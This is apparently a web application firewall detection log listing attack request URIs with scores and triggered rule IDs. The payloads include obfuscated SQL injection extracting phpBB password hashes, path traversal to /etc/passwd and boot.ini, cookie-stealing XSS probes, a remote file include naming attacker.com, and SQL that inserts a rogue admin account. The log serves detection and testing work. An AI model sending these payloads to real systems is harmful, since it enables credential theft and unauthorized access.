Packet [848]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6fn%20s%65%6c%65%63t%20%6f%72%64%28s%75%62%73t%72i%6eg%28%75s%65%72_%70as%73%77ord]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [849]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69%6fn%20%73ele%63%74%20o%72%64%28s%75b%73t%72i%6eg%28%75s%65%72%5f%70%61s%73%77ord]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [850]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20uni%6f%6e%20sel%65c%74%20%6f%72%64%28%73u%62string%28%75%73er%5fpa%73%73w%6frd]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [851]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6e%69%6f%6e%20%73%65%6cect%20or%64%28%73ub%73t%72in%67%28%75s%65r%5f%70assw%6f%72d%2c29]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [852]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20u%6ei%6f%6e%20se%6cec%74%20%6fr%64%28%73%75%62s%74ring%28%75%73e%72_%70%61%73%73w%6fr%64%2c30%2c%31%29%29%20f%72%6fm%20p%68%70bb_%75s%65r%73%20wh%65re%20%75%73%65r%5f%69d%3d2%2f%2A&view=newest]	PLmin [1]	Score [15]	Nattacks [3]	[942190]	[942270]	[942360]
Packet [853]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75n%69o%6e%20%73e%6c%65%63t%20o%72%64%28sub%73%74%72i%6e%67%28u%73e%72%5f%70as%73w%6f%72%64]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [854]	Uri [/phpBB2/viewtopic.php?sid=1&topic_id=-1%20%75%6eio%6e%20%73%65l%65c%74%20%6f%72d%28s%75%62s%74r%69%6e%67%28u%73e%72_pa%73%73%77%6fr%64%2c32]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [855]	Uri [/cgi-bin/FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com]	PLmin [1]	Score [10]	Nattacks [2]	[930120]	[932160]
Packet [862]	Uri [/cgi-bin/GW5/GWWEB.EXE?HELP=../../../secret.htm]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [863]	Uri [/cgi-bin/GW5/GWWEB.EXE?HELP=../../../]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [865]	Uri [/gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/]	PLmin [1]	Score [5]	Nattacks [1]	[931110]
Packet [867]	Uri [/cgi-bin/queries.php?include=image.png&account=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [870]	Uri [/examplesWebApp/InteractiveQuery.jsp?person=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [873]	Uri [/friend.php?op=SiteSent&fname=%3Cscript%3Ealert%28%27Vulnerable%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [878]	Uri [/cgi-bin/search.cgi?letter=..%5C..%5C..%5C..%5Calgo&start=1&perpage=all]	PLmin [1]	Score [10]	Nattacks [1]	[930100]
Packet [886]	Uri [/phpgedview/search.php?action=soundex&firstname=%22%3E&lt%3Bscript&gt%3Balert%28document.cookie%29&lt%3B/script&gt%3B]	PLmin [1]	Score [5]	Nattacks [1]	[941180]
Packet [894]	Uri [/isqlplus?action=logon&username=sdfds%22%3e%3cscript%3ealert%28%27XSS%27%29%3c/script%3e%5C&password=dsfsd%3cscript%3ealert%28%27XSS%27%29%3c/script%3e]	PLmin [1]	Score [30]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [895]	Uri [/isqlplus?action=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [896]	Uri [/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htw?CiWebHitsFile=../../../../boot.ini&CiRestriction=none&CiHiliteType=Full]	PLmin [1]	Score [40]	Nattacks [4]	[920440]	[930100]	[930110]	[930120]
Packet [897]	Uri [/scripts/ISAPISkeleton.dll?%3Cscript%3Ealert%28%22Ooops%21%22%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[920440]	[941100]	[941110]	[941160]
Packet [899]	Uri [/_admin/list_all.php?folder=../]	PLmin [1]	Score [10]	Nattacks [1]	[930110]
Packet [901]	Uri [/sample_script_directory/Sample_showcode.html?fname=/../../../../ceres.ugr.es]	PLmin [1]	Score [30]	Nattacks [2]	[930100]	[930110]
Packet [905]	Uri [/showmail.pl?Folder=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [908]	Uri [/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%20union%20select/%2A]	PLmin [1]	Score [10]	Nattacks [2]	[942190]	[942360]
Packet [909]	Uri [/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%3B%20EXECUTE%20IMMEDIATE%20%27SEL%27%20%7C%7C%20%27ECT%20US%27%20%7C%7C%20%27ER%27/%2A]	PLmin [1]	Score [5]	Nattacks [1]	[942250]
Packet [910]	Uri [/forum/index.php?act=Search&nav=lv&CODE=show&searchid=&search_in=topics&result_type=topics&hl=&st=20%27%3B%20EXEC%20%28%27SEL%27%20%2B%20%27ECT%20US%27%20%2B%20%27ER%27%29/%2A]	PLmin [1]	Score [5]	Nattacks [1]	[933160]
Packet [911]	Uri [/page.php?page_type=catalog_products&type_id%5B%5D=%3Cscript%3Ealert%28document.domain%29%3B%3C/script%3E&SESSION_ID=%7BSESSION_ID%7D&SESSION_ID=]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[943120]
Packet [913]	Uri [/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert%28%22G%22%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [914]	Uri [/webmail/emumail.fcgi?passed=go_index&folder=%3Cscript%3Ealert%28%22G%22%29%3C/script%3E]	PLmin [1]	Score [15]	Nattacks [3]	[941100]	[941110]	[941160]
Packet [916]	Uri [/phpBB/viewtopic.php?t=17071&highlight=%22%3E%22%3CScript%3Ejavascript:alert%28d]	PLmin [1]	Score [25]	Nattacks [5]	[941100]	[941110]	[941160]	[941170]	[941210]
Packet [917]	Uri [/nuke71/modules.php?name=Recommend_Us&op=SiteSent&fname=%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [918]	Uri [/nuke71/modules.php?name=Downloads&d_op=TopRated&ratenum=%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&ratetype=x]	PLmin [1]	Score [20]	Nattacks [4]	[941100]	[941110]	[941160]	[941180]
Packet [922]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3bupdate%20CMS35%2eAdmin%20set%20Password%3dcast%28%27AA%27%20as%20varbinary%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [2]	[942350]	[942360]
Packet [923]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3bupdate%20CMS35%2eAdmin%20set%20Password%3dcast%28%27AA%27%20as%20varbinary%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [2]	[942350]	[942360]
Packet [924]	Uri [/servlet/Sygate.Servlet.login?uid=%27%3binsert%20into%20CMS35%2eAdmin%20%28RecUpdateTime%2cLoginName%2cAdminNickName%2cPassword%2cAdminRights%2cAdminEmail%2cFailedLogin%2cAlertOnFailure%2cAlertFailureThreshold%2cOnlineState%29%20values%20%28getutcdate%28%29%2c%27reporting%27%2c%27reporting%27%2c0x10DDD9DCF0A5244E8BED97B540D1CE14E8D54A8E%2c%27255%27%2c%27%27%2c0%2c0%2c0%2c0%29%20%2d%2d%20&up=foo]	PLmin [1]	Score [10]	Nattacks [2]	[942350]	[942360]
Packet [925]	Uri [/cgi-bin/search/search.cgi?keys=%2A&prc=any&catigory=../../../../../../../../etc]	PLmin [1]	Score [35]	Nattacks [2]	[930100]	[930110]
